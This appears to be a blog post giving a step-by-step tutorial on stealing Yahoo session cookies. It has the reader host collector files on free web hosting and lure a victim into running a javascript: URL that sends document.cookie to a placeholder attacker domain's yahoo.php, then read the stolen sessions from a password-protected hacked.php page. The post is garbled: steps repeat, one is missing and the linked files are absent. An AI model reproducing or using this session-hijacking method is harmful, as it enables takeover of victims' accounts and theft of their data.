What are session IDs or session cookies ?whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.
Just login to yahoo.com. Type in browser javascript:alert(document.cookie);
You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .
But in case of yahoo, its not the same.The attacker doesnt get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the yahoo accountsession is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.
Download some files from here
click here
Tutorial to steal session IDs :-1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.
2. Login to your account and go to file manager. Upload the four files that you have just downloaded.
Make a new directory 'cookies' here.
click here
Tutorial to steal session IDs :-1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.
2. Login to your account and go to file manager. Upload the four files that you have just downloaded.
Make a new directory 'cookies' here.
Stolen cookies get stored in directory 'cookies'
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
He would again redirected to his yahoo account.
4. Open the hacked.php . The password is 'explore'.
No comments:
Post a Comment